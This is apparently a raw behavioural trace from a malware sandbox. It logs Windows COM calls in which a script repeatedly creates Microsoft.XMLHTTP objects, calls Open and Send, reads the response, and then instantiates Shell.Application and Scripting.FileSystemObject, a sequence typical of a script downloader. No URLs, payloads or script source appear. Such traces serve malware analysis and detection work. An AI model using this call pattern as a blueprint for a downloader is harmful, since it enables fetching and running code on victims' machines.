	[0215.149] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0215.149] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7598) returned 0x0
	[0215.149] ??2@YAPEAX_K@Z () returned 0x62b540
	[0215.149] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7598, pUnkSite=0x62b540) 
	[0215.149] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0215.149] XMLHTTPRequest:IUnknown:Release (This=0x49c7598) returned 0x0
	[0215.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0215.150] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0215.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.150] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.150] longjmp () 
	[0215.150] longjmp () 
	[0215.150] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.150] SysStringLen (param_1=0x0) returned 0x0
	[0215.150] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.150] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0215.150] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c75e8) returned 0x0
	[0215.150] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0215.150] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c75e8, pUnkSite=0x629bd0) 
	[0215.150] XMLHTTPRequest:IUnknown:QueryInterface (This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0215.150] XMLHTTPRequest:IUnknown:Release (This=0x49c75e8) returned 0x0
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0215.151] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.151] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.151] longjmp () 
	[0215.151] longjmp () 
	[0215.151] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.151] SysStringLen (param_1=0x0) returned 0x0
	[0215.151] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.151] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0215.151] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0215.151] ??2@YAPEAX_K@Z () returned 0x62b540
	[0215.151] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62b540) 
	[0215.151] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0215.152] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0215.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0215.152] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0215.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.152] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.152] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0215.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0217.138] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bb98) 
	[0234.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0234.092] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0234.092] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0234.093] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0234.093] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0234.093] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0234.093] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0234.095] SysStringLen (param_1=0x0) returned 0x0
	[0234.095] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0234.096] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0234.096] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0234.096] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0234.096] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0234.097] ??2@YAPEAX_K@Z () returned 0x62f330
	[0234.097] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f330) returned 0x0
	[0234.097] XMLHTTPRequest:IUnknown:AddRef (This=0x62f330) returned 0x2
	[0234.101] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0234.101] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0234.101] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0234.102] Shell:IUnknown:Release (This=0x3967c0) returned 0x2
	[0234.102] Shell:IUnknown:Release (This=0x3967c0) returned 0x1
	[0234.102] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x2
	[0234.102] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0234.103] SysStringLen (param_1=0x0) returned 0x0
	[0234.103] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x46aed0) returned 0x0
	[0234.427] FileSystemObject:IUnknown:QueryInterface (in: This=0x46aed0, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0234.427] FileSystemObject:IClassFactory:CreateInstance (in: This=0x46aed0, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0234.427] FileSystemObject:IUnknown:Release (This=0x46aed0) returned 0x0
	[0234.427] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0234.427] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0234.427] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0234.427] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x2
	[0234.427] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x1
	[0234.427] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x2
	[0234.437] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x2
	[0234.437] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28c2b0 | out: ppvObject=0x28c2b0*=0x0) returned 0x80004002
	[0235.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0235.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0235.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0235.082] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.082] SysStringLen (param_1=0x0) returned 0x0
	[0235.082] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0235.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0235.083] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.083] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0235.083] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.083] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0235.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0235.083] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0235.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.083] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
